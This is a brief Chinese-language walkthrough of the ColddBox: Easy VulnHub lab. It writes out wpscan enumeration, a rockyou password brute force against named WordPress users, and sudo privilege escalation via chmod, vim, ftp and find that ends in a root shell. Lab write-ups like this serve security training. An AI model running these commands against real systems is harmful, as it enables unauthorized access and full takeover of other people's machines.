vulnhub COLDDBOX: EASY


netdiscover扫主机。
1.png

80:http,4512:ssh
2.png

wpscan扫的话扫出一个xss和一个phpmailer的对象注入

wpscan --url http://192.168.0.100/ --api-token xxxxxxx
3.png

申请个wpscan的api。参考链接

扫用户
wpscan --url http://192.168.0.100/ -e

暴力破解账号为这几个的密码
wpscan --url http://192.168.0.100/ --api-token xxxxxxx --passwords /usr/share/wordlists/rockyou.txt --usernames c0ldd,philp,hugo

4.png

直接写一个system的一句话
5.png

这个图的话是直接在页面执行反弹shell的命令反弹不回来,一定要去访问那个链接才可以反弹
5-2.png

搭配图5食用,直接反弹过来了。
6.png

这边没有用python开shell,直接看wp-config配置文件
7.png

我这边是ssh连的,或者在刚刚那个shell里面su切用户也可以
9.png

命令列出可供当前用户使用的二进制文件
sudo-l.png

chmod提权

1
2
sudo -u root chmod 4755 /bin/bash
bash -p

10.png

vim提权

1
sudo -u root vim -c ':!/bin/bash'

10-2.png

ftp提权

1
2
sudo -u root ftp
!/bin/bash

10-3.png

find提权

1
find . -exec /bin/sh -p  \; -quit

10-4.png

cat了两个flag,base64解密就出来了
final.png

其他参考:
1.宝藏提权网站
https://gtfobins.github.io/

2.walkthrough
https://musyokaian.medium.com/colddbox-tryhackme-walkthrough-cc0b017189d2
3.walkthrough
https://infosecwriteups.com/colddbox-easy-vulnhub-walkthrough-cac3680e03c2